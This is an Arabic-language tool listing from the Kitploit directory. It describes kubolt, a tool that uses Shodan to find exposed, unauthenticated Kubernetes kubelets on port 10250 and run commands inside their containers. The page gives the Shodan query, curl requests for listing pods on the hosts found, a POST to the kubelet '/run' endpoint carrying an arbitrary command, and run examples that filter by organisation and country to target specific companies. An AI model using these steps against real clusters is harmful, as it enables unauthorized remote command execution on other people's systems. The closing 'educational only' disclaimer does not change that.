Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
kubolt — أداة Kubolt لفحص مجموعات Kubernetes العامة | Kitploit
أدوات/GitHubGitHub/averonesis/kubolt
الاستخبارات مفتوحة المصدر (OSINT)الاستطلاعماسحات الثغرات الأمنيةأمن الحاوياتأمن السحابةسوء التكوين
GitHubaveronesis/kubolt

kubolt

أداة Kubolt لفحص مجموعات Kubernetes العامة

عرض المستودع
11019منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماذا؟

Kubolt هي أداة بسيطة لمسح مجموعات Kubernetes العامة غير المُوثَّقة وتشغيل الأوامر داخل الحاويات

لماذا؟

أحيانًا، يكون منفذ kubelet 10250 مفتوحًا للوصول غير المصرح به مما يجعل من الممكن تشغيل الأوامر داخل الحاويات باستخدام دالة getrun من kubelet:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

كيف؟

حسنًا، دعنا نسأل صديقنا Shodan :trollface:

الاستعلام الأساسي هو

ssl:true port:10250 404

يستخدم Kubelet المنفذ 10250 مع SSL افتراضيًا، و404 هي استجابة HTTP بدون مسار URL.

يسأل Kubolt Shodan عبر API عن قائمة عناوين IP ويحتفظ بها لإجراءات OSINT أخرى 😁

أولاً، دعنا نسأل Kubelet عن البودات الجارية ونقوم بتصفية المضيفين حيث لا تحتوي الاستجابة على Unauthorized وتحتوي على container حتى نتمكن من تشغيل أمر داخله.

root@kitploit:~
curl -k https://IP-from-Shodan:10250/runningpods/ 

على أي حال، إذا وجدت المضيف بدون أي بودات جارية في الوقت الحالي، احتفظ به للمرة القادمة عندما قد تبدأ البودات 😁

يمكنك سرد جميع البودات المتاحة من هذه الطلبات:

root@kitploit:~
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/ 

بعد ذلك، يقوم kubolt بتحليل الاستجابة وإنشاء طلب جديد كما يلي:

root@kitploit:~
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

يمكنك استهداف الشركات بدقة أكبر باستخدام مرشحات Shodan مثل:

  • asn
  • org
  • country
  • net

التثبيت

root@kitploit:~
mkdir output
pip install -r requirements.txt 

التشغيل

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

يستخدم Kubolt واجهة برمجة تطبيقات Shodan و رصيد الاستعلامات وفقًا لذلك، إذا قمت بتشغيل الأداة بدون مرشحات استعلام فمن المحتمل أن تستهلك كل رصيدك ¯\_(ツ)_/¯

عرض توضيحي

demo

مهم

يجب استخدام الأداة التي قدمها المؤلف للأغراض التعليمية فقط. لا يمكن تحميل المؤلف المسؤولية عن إساءة استخدام الأداة. المؤلف غير مسؤول عن أي ضرر مباشر أو غير مباشر ناتج عن استخدام الأداة.

تنزيل الأداة